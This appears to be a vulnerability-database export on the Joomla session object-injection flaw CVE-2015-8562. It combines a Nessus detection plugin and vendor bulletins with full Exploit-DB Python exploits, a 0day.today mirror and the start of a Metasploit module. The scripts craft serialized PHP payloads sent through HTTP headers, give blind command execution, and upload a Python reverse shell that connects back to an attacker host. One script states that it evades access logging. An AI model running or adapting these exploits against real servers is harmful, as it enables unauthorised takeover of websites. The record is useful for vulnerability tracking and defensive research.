script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is prior to 3.4.7. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A SQL injection vulnerability exists due to improper\n sanitization of user-supplied input. A remote attacker\n can exploit this to inject or manipulate SQL queries in\n the back-end database, resulting in the manipulation or\n disclosure of arbitrary data.\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. 
An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. Note that CVE-2015-8562 was\n addressed in version 3.4.6; however, the core issue\n involves a fix to PHP.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.joomla.org/announcements/release-news/5643-joomla-3-4-7.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3b5dd1d2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! version 3.4.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-8769\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/06\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = install['version'];\ninstall_loc = build_url(port:port, qs:install['path']);\n\nfix = \"3.4.7\";\n\n# Pull out the purely numeric version\nnumeric = eregmatch(string:version, pattern:\"^([0-9\\.]+)($|[^0-9])\");\n\nif (empty_or_null(numeric))\n audit(AUDIT_UNKNOWN_WEB_APP_VER, app, install_loc);\n\nnumeric = numeric[1];\n\nif (numeric == \"3.4\")\n audit(AUDIT_VER_NOT_GRANULAR, app, version);\n\n# Version 1.5.0 - 3.4.6 vulnerable to RCE\n# https://developer.joomla.org/security-centre/639-20151206-core-session-hardening.html\nif (ver_compare(ver:numeric, fix:\"1.5.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:numeric, fix:fix, strict:FALSE) < 0)\n{\n order = make_list(\"URL\", \"Installed version\", \"Fixed version\");\n report = make_array(\n order[0], install_loc,\n order[1], version,\n order[2], fix\n );\n report = report_items_str(report_items:report, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE, sqli:TRUE);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "joomla": [{"lastseen": "2019-05-29T19:31:43", "bulletinFamily": "software", "description": "Inadequate filtering of request data leads to a Directory Traversal vulnerability.\n", "modified": 
"2015-12-14T00:00:00", "published": "2015-12-14T00:00:00", "href": "https://developer.joomla.org/security-centre/635-20151214-core-directory-traversal-2.html?highlight=WyJleHBsb2l0Il0=", "id": "JOOMLA-635", "type": "joomla", "title": "[20151204] - Core - Directory Traversal", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T19:31:48", "bulletinFamily": "software", "description": "Add additional CSRF hardening in com_templates.\n", "modified": "2015-12-14T00:00:00", "published": "2015-12-14T00:00:00", "href": "https://developer.joomla.org/security-centre/633-20151214-core-csrf-hardening.html?highlight=WyJleHBsb2l0Il0=", "id": "JOOMLA-633", "type": "joomla", "title": "[20151202] - Core - CSRF Hardening", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T19:31:48", "bulletinFamily": "software", "description": "Browser information is not filtered properly while saving the session values into the database which leads to a Remote Code Execution vulnerability.\n", "modified": "2015-12-14T00:00:00", "published": "2015-12-14T00:00:00", "href": "https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html?highlight=WyJleHBsb2l0Il0=", "id": "JOOMLA-630", "type": "joomla", "title": "[20151201] - Core - Remote Code Execution Vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T19:31:46", "bulletinFamily": "software", "description": "Failure to properly sanitise input data from the XML install file located within an extension's package archive allows for directory traversal.\n", "modified": "2015-12-14T00:00:00", "published": "2015-12-14T00:00:00", "href": "https://developer.joomla.org/security-centre/634-20151214-core-directory-traversal.html?highlight=WyJleHBsb2l0Il0=", "id": "JOOMLA-634", "type": "joomla", "title": "[20151203] - Core - Directory Traversal", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "canvas": [{"lastseen": "2019-05-29T19:48:28", "bulletinFamily": "exploit", "description": "**Name**| joomla_session_unserialize \n---|--- \n**CVE**| CVE-2015-8562 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Joomla session unserialize 1.5 to 3.4.5 \n**Notes**| Repeatability: Infinite \nVENDOR: Joomla \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562 \nCVE Name: CVE-2015-8562 \n\n", "modified": "2015-12-16T21:59:00", "published": "2015-12-16T21:59:00", "id": "JOOMLA_SESSION_UNSERIALIZE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/joomla_session_unserialize", "title": "Immunity Canvas: JOOMLA_SESSION_UNSERIALIZE", "type": "canvas", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2016-10-03T15:01:53", "bulletinFamily": "exploit", "description": "Added: 12/17/2015 \nCVE: [CVE-2015-8562](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562>) \nBID: [79195](<http://www.securityfocus.com/bid/79195>) \n\n\n### Background\n\n[Joomla](<https://www.joomla.org/about-joomla.html>) is a content management system written in PHP. \n\n### Problem\n\nA vulnerability which occurs when Joomla saves browser session information could allow a remote, unauthenticated attacker to inject PHP objects via the User-Agent header, leading to arbitrary command execution. \n\n### Resolution\n\n[Upgrade](<https://www.joomla.org/download.html>) to Joomla 3.4.6 or higher. \n\n### References\n\n<https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html> \n<https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html> \n\n\n### Limitations\n\nExploit works on Joomla 3.4.5 running on Linux. 
\n\n### Platforms\n\nLinux \n \n\n", "modified": "2015-12-17T00:00:00", "published": "2015-12-17T00:00:00", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/joomla_user_agent", "id": "SAINT:1E0BFF3A5AC9A780E289B143FCC5F23A", "type": "saint", "title": "Joomla User-Agent PHP object injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:35", "bulletinFamily": "exploit", "description": "Added: 12/17/2015 \nCVE: [CVE-2015-8562](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562>) \nBID: [79195](<http://www.securityfocus.com/bid/79195>) \n\n\n### Background\n\n[Joomla](<https://www.joomla.org/about-joomla.html>) is a content management system written in PHP. \n\n### Problem\n\nA vulnerability which occurs when Joomla saves browser session information could allow a remote, unauthenticated attacker to inject PHP objects via the User-Agent header, leading to arbitrary command execution. \n\n### Resolution\n\n[Upgrade](<https://www.joomla.org/download.html>) to Joomla 3.4.6 or higher. \n\n### References\n\n<https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html> \n<https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html> \n\n\n### Limitations\n\nExploit works on Joomla 3.4.5 running on Linux. 
\n\n### Platforms\n\nLinux \n \n\n", "modified": "2015-12-17T00:00:00", "published": "2015-12-17T00:00:00", "id": "SAINT:C6AA8FC60EF73B444D044C4F52877D2B", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/joomla_user_agent", "title": "Joomla User-Agent PHP object injection", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T19:19:27", "bulletinFamily": "exploit", "description": "Added: 12/17/2015 \nCVE: [CVE-2015-8562](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562>) \nBID: [79195](<http://www.securityfocus.com/bid/79195>) \n\n\n### Background\n\n[Joomla](<https://www.joomla.org/about-joomla.html>) is a content management system written in PHP. \n\n### Problem\n\nA vulnerability which occurs when Joomla saves browser session information could allow a remote, unauthenticated attacker to inject PHP objects via the User-Agent header, leading to arbitrary command execution. \n\n### Resolution\n\n[Upgrade](<https://www.joomla.org/download.html>) to Joomla 3.4.6 or higher. \n\n### References\n\n<https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html> \n<https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html> \n\n\n### Limitations\n\nExploit works on Joomla 3.4.5 running on Linux. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2015-12-17T00:00:00", "published": "2015-12-17T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/joomla_user_agent", "id": "SAINT:150A052478728FE6FC97F9B52382B525", "title": "Joomla User-Agent PHP object injection", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-04T09:14:25", "bulletinFamily": "exploit", "description": "Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution. CVE-2015-8562. 
Webapps exploit for php platform", "modified": "2015-12-15T00:00:00", "published": "2015-12-15T00:00:00", "id": "EDB-ID:38977", "href": "https://www.exploit-db.com/exploits/38977/", "type": "exploitdb", "title": "Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution", "sourceData": "'''\r\n Simple PoC for Joomla Object Injection.\r\n Gary @ Sec-1 ltd\r\n http://www.sec-1.com/\r\n'''\r\n \r\nimport requests # easy_install requests\r\n \r\ndef get_url(url, user_agent):\r\n \r\n headers = {\r\n 'User-Agent': user_agent\r\n }\r\n cookies = requests.get(url,headers=headers).cookies\r\n for _ in range(3):\r\n response = requests.get(url, headers=headers,cookies=cookies) \r\n return response\r\n \r\ndef php_str_noquotes(data):\r\n \"Convert string to chr(xx).chr(xx) for use in php\"\r\n encoded = \"\"\r\n for char in data:\r\n encoded += \"chr({0}).\".format(ord(char))\r\n \r\n return encoded[:-1]\r\n \r\n \r\ndef generate_payload(php_payload):\r\n \r\n php_payload = \"eval({0})\".format(php_str_noquotes(php_payload))\r\n \r\n terminate = '\\xf0\\xfd\\xfd\\xfd';\r\n exploit_template = r'''}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";'''\r\n injected_payload = \"{};JFactory::getConfig();exit\".format(php_payload) \r\n exploit_template += r'''s:{0}:\"{1}\"'''.format(str(len(injected_payload)), injected_payload)\r\n exploit_template += r''';s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}''' + terminate\r\n \r\n return exploit_template\r\n \r\n \r\n \r\npl = generate_payload(\"system('touch /tmp/fx');\")\r\n \r\nprint get_url(\"http://172.31.6.242/\", pl)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": 
"https://www.exploit-db.com/download/38977/"}, {"lastseen": "2016-02-04T09:21:49", "bulletinFamily": "exploit", "description": "Joomla 1.5 - 3.4.5 - Object Injection RCE X-Forwarded-For Header. CVE-2015-8562,CVE-2015-8566. Webapps exploit for php platform", "modified": "2015-12-18T00:00:00", "published": "2015-12-18T00:00:00", "id": "EDB-ID:39033", "href": "https://www.exploit-db.com/exploits/39033/", "type": "exploitdb", "title": "Joomla 1.5 - 3.4.5 - Object Injection RCE X-Forwarded-For Header", "sourceData": "#!/usr/bin/env python\r\n\r\n# Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header\r\n# Date: 12/17/2015\r\n# Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs)\r\n# Vendor Homepage: https://www.joomla.org/\r\n# Software Link: http://joomlacode.org/gf/project/joomla/frs/\r\n# Version: Joomla 1.5 - 3.4.5\r\n# Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable)\r\n# CVE : CVE-2015-8562\r\n\r\n\r\n'''\r\n Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562\r\n PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE\r\n\r\n Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com): \r\n https://www.exploit-db.com/exploits/38977/\r\n\r\n Vulnerability Info, Exploit, Detection:\r\n https://breakpoint-labs.com/joomla-rce-cve-2015-8562/\r\n\r\n Exploit modified to use \"X-Forwarded-For\" header instead of \"User-Agent\" to avoid default logged to access.log\r\n\r\n Usage - Automate Blind RCE:\r\n python joomla-rce-2-shell.py -t http://192.168.1.139/ --cmd\r\n $ touch /tmp/newhnewh \r\n\r\n Usage - Spawn Reverse Shell using Pentestmonkey's Python one-liner and netcat listener on local host:\r\n python joomla-rce-2-shell.py -t http://192.168.1.139/ -l 192.168.1.119 -p 4444\r\n [-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://192.168.1.139/\r\n [-] Uploading python reverse shell with LHOST:192.168.1.119 and LPORT:4444\r\n <Response [200]>\r\n [+] Spawning reverse 
shell....\r\n <Response [200]>\r\n\r\n Listening on [0.0.0.0] (family 0, port 4444)\r\n $ python -c \"import pty;pty.spawn('/bin/bash')\"\r\n www-data@ubuntu:/$ id\r\n uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n www-data@ubuntu:/$ \r\n\r\n'''\r\n \r\nimport requests\r\nimport subprocess\r\nimport argparse\r\nimport sys\r\nimport base64\r\n \r\n# Heavy lifting from PoC author Gary@ Sec-1 ltd (http://www.sec-1.com)\r\ndef get_url(url, user_agent):\r\n \r\n headers = {\r\n 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3', # Change default UA for Requests\r\n 'x-forwarded-for': user_agent # X-Forwarded-For header instead of UA\r\n }\r\n cookies = requests.get(url,headers=headers).cookies\r\n for _ in range(3):\r\n response = requests.get(url, headers=headers,cookies=cookies) \r\n return response\r\n\r\n\r\ndef php_str_noquotes(data):\r\n \"Convert string to chr(xx).chr(xx) for use in php\"\r\n encoded = \"\"\r\n for char in data:\r\n encoded += \"chr({0}).\".format(ord(char))\r\n \r\n return encoded[:-1]\r\n\r\n \r\ndef generate_payload(php_payload):\r\n \r\n php_payload = \"eval({0})\".format(php_str_noquotes(php_payload))\r\n \r\n terminate = '\\xf0\\xfd\\xfd\\xfd';\r\n exploit_template = r'''}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";'''\r\n injected_payload = \"{};JFactory::getConfig();exit\".format(php_payload) \r\n exploit_template += r'''s:{0}:\"{1}\"'''.format(str(len(injected_payload)), injected_payload)\r\n exploit_template += r''';s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}''' + terminate\r\n \r\n return exploit_template\r\n\r\n\r\ndef 
main():\r\n parser = argparse.ArgumentParser(prog='cve-2015-8562.py', description='Automate blind RCE for Joomla vuln CVE-2015-8652')\r\n parser.add_argument('-t', dest='RHOST', required=True, help='Remote Target Joomla Server')\r\n parser.add_argument('-l', dest='LHOST', help='specifiy local ip for reverse shell')\r\n parser.add_argument('-p', dest='LPORT', help='specifiy local port for reverse shell')\r\n parser.add_argument('--cmd', dest='cmd', action='store_true', help='drop into blind RCE')\r\n\r\n args = parser.parse_args()\r\n\r\n if args.cmd:\r\n print \"[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}\".format(args.RHOST)\r\n print \"[-] Dropping into shell-like environment to perform blind RCE\"\r\n while True:\r\n command = raw_input('$ ')\r\n cmd_str = \"system('{}');\".format(command)\r\n pl = generate_payload(cmd_str)\r\n print get_url(args.RHOST, pl)\r\n\r\n # Spawn Reverse Shell using Netcat listener + Python shell on victim\r\n elif args.LPORT and args.LPORT:\r\n connection = \"'{}', {}\".format(args.LHOST, args.LPORT)\r\n\r\n # pentestmonkey's Python reverse shell one-liner:\r\n shell_str = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('''+connection+'''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'''\r\n # Base64 encoded the Python reverse shell as some chars were messing up in the exploit\r\n encoded_comm = base64.b64encode(shell_str)\r\n # Stage 1 payload Str\r\n payload = \"echo {} | base64 -d > /tmp/newhnewh.py\".format(encoded_comm)\r\n print \"[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}\".format(args.RHOST)\r\n print \"[-] Uploading python reverse shell with LHOST {} and {}\".format(args.LHOST, args.LPORT)\r\n # Stage 1: Uploads the Python reverse shell to \"/tmp/newhnewh.py\"\r\n pl = generate_payload(\"system('\"+payload+\"');\")\r\n print get_url(args.RHOST, pl)\r\n # Spawns Shell listener using 
netcat on LHOST\r\n listener = subprocess.Popen(args=[\"gnome-terminal\", \"--command=nc -lvp \"+args.LPORT])\r\n print \"[+] Spawning reverse shell....\"\r\n # Stage 2: Executes Python reverse shell back to LHOST:LPORT\r\n pl = generate_payload(\"system('python /tmp/newhnewh.py');\")\r\n print get_url(args.RHOST, pl)\r\n else:\r\n print '[!] missing arguments'\r\n parser.print_help()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/39033/"}], "zdt": [{"lastseen": "2018-04-04T19:32:48", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2015-12-18T00:00:00", "published": "2015-12-18T00:00:00", "id": "1337DAY-ID-24758", "href": "https://0day.today/exploit/description/24758", "type": "zdt", "title": "Joomla 1.5 - 3.4.5 - Object Injection RCE X-Forwarded-For Header Exploit", "sourceData": "#!/usr/bin/env python\r\n \r\n# Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header\r\n# Date: 12/17/2015\r\n# Exploit Author: original - [email\u00a0protected] Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs)\r\n# Vendor Homepage: https://www.joomla.org/\r\n# Software Link: http://joomlacode.org/gf/project/joomla/frs/\r\n# Version: Joomla 1.5 - 3.4.5\r\n# Tested on: Ubuntu 14.04.2 LTS (Joomla! 
3.2.1 Stable)\r\n# CVE : CVE-2015-8562\r\n \r\n \r\n'''\r\n Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562\r\n PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE\r\n \r\n Original PoC from [email\u00a0protected] Sec-1 ltd (http://www.sec-1.com): \r\n https://www.exploit-db.com/exploits/38977/\r\n \r\n Vulnerability Info, Exploit, Detection:\r\n https://breakpoint-labs.com/joomla-rce-cve-2015-8562/\r\n \r\n Exploit modified to use \"X-Forwarded-For\" header instead of \"User-Agent\" to avoid default logged to access.log\r\n \r\n Usage - Automate Blind RCE:\r\n python joomla-rce-2-shell.py -t http://192.168.1.139/ --cmd\r\n $ touch /tmp/newhnewh \r\n \r\n Usage - Spawn Reverse Shell using Pentestmonkey's Python one-liner and netcat listener on local host:\r\n python joomla-rce-2-shell.py -t http://192.168.1.139/ -l 192.168.1.119 -p 4444\r\n [-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://192.168.1.139/\r\n [-] Uploading python reverse shell with LHOST:192.168.1.119 and LPORT:4444\r\n <Response [200]>\r\n [+] Spawning reverse shell....\r\n <Response [200]>\r\n \r\n Listening on [0.0.0.0] (family 0, port 4444)\r\n $ python -c \"import pty;pty.spawn('/bin/bash')\"\r\n [email\u00a0protected]:/$ id\r\n uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n [email\u00a0protected]:/$ \r\n \r\n'''\r\n \r\nimport requests\r\nimport subprocess\r\nimport argparse\r\nimport sys\r\nimport base64\r\n \r\n# Heavy lifting from PoC author [email\u00a0protected] Sec-1 ltd (http://www.sec-1.com)\r\ndef get_url(url, user_agent):\r\n \r\n headers = {\r\n 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3', # Change default UA for Requests\r\n 'x-forwarded-for': user_agent # X-Forwarded-For header instead of UA\r\n }\r\n cookies = requests.get(url,headers=headers).cookies\r\n for _ in range(3):\r\n response = requests.get(url, 
headers=headers,cookies=cookies) \r\n return response\r\n \r\n \r\ndef php_str_noquotes(data):\r\n \"Convert string to chr(xx).chr(xx) for use in php\"\r\n encoded = \"\"\r\n for char in data:\r\n encoded += \"chr({0}).\".format(ord(char))\r\n \r\n return encoded[:-1]\r\n \r\n \r\ndef generate_payload(php_payload):\r\n \r\n php_payload = \"eval({0})\".format(php_str_noquotes(php_payload))\r\n \r\n terminate = '\\xf0\\xfd\\xfd\\xfd';\r\n exploit_template = r'''}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";'''\r\n injected_payload = \"{};JFactory::getConfig();exit\".format(php_payload) \r\n exploit_template += r'''s:{0}:\"{1}\"'''.format(str(len(injected_payload)), injected_payload)\r\n exploit_template += r''';s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}''' + terminate\r\n \r\n return exploit_template\r\n \r\n \r\ndef main():\r\n parser = argparse.ArgumentParser(prog='cve-2015-8562.py', description='Automate blind RCE for Joomla vuln CVE-2015-8652')\r\n parser.add_argument('-t', dest='RHOST', required=True, help='Remote Target Joomla Server')\r\n parser.add_argument('-l', dest='LHOST', help='specifiy local ip for reverse shell')\r\n parser.add_argument('-p', dest='LPORT', help='specifiy local port for reverse shell')\r\n parser.add_argument('--cmd', dest='cmd', action='store_true', help='drop into blind RCE')\r\n \r\n args = parser.parse_args()\r\n \r\n if args.cmd:\r\n print \"[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}\".format(args.RHOST)\r\n print \"[-] Dropping into shell-like environment to perform blind RCE\"\r\n while True:\r\n command = raw_input('$ ')\r\n cmd_str = \"system('{}');\".format(command)\r\n pl = generate_payload(cmd_str)\r\n 
print get_url(args.RHOST, pl)\r\n \r\n # Spawn Reverse Shell using Netcat listener + Python shell on victim\r\n elif args.LPORT and args.LPORT:\r\n connection = \"'{}', {}\".format(args.LHOST, args.LPORT)\r\n \r\n # pentestmonkey's Python reverse shell one-liner:\r\n shell_str = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('''+connection+'''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'''\r\n # Base64 encoded the Python reverse shell as some chars were messing up in the exploit\r\n encoded_comm = base64.b64encode(shell_str)\r\n # Stage 1 payload Str\r\n payload = \"echo {} | base64 -d > /tmp/newhnewh.py\".format(encoded_comm)\r\n print \"[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}\".format(args.RHOST)\r\n print \"[-] Uploading python reverse shell with LHOST {} and {}\".format(args.LHOST, args.LPORT)\r\n # Stage 1: Uploads the Python reverse shell to \"/tmp/newhnewh.py\"\r\n pl = generate_payload(\"system('\"+payload+\"');\")\r\n print get_url(args.RHOST, pl)\r\n # Spawns Shell listener using netcat on LHOST\r\n listener = subprocess.Popen(args=[\"gnome-terminal\", \"--command=nc -lvp \"+args.LPORT])\r\n print \"[+] Spawning reverse shell....\"\r\n # Stage 2: Executes Python reverse shell back to LHOST:LPORT\r\n pl = generate_payload(\"system('python /tmp/newhnewh.py');\")\r\n print get_url(args.RHOST, pl)\r\n else:\r\n print '[!] missing arguments'\r\n parser.print_help()\r\n \r\n \r\nif __name__ == \"__main__\":\r\n main()\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24758"}, {"lastseen": "2018-03-02T17:40:00", "bulletinFamily": "exploit", "description": "Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. 
By storing user-supplied headers in the database's session table it's possible to truncate the input by sending a 4-byte UTF-8 character. The custom created payload is then executed once the session is read from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. In later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.", "modified": "2015-12-19T00:00:00", "published": "2015-12-19T00:00:00", "id": "1337DAY-ID-24763", "href": "https://0day.today/exploit/description/24763", "type": "zdt", "title": "Joomla 1.5 - 3.4.5 - HTTP Header Unauthenticated Remote Code Execution Exploit", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Joomla HTTP Header Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5.\r\n By storing user supplied headers in the databases session table it's possible to truncate the input\r\n by sending an UTF-8 character. The custom created payload is then executed once the session is read\r\n from the databse. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13.\r\n In later versions the deserialisation of invalid session data stops on the first error and the\r\n exploit will not work. 
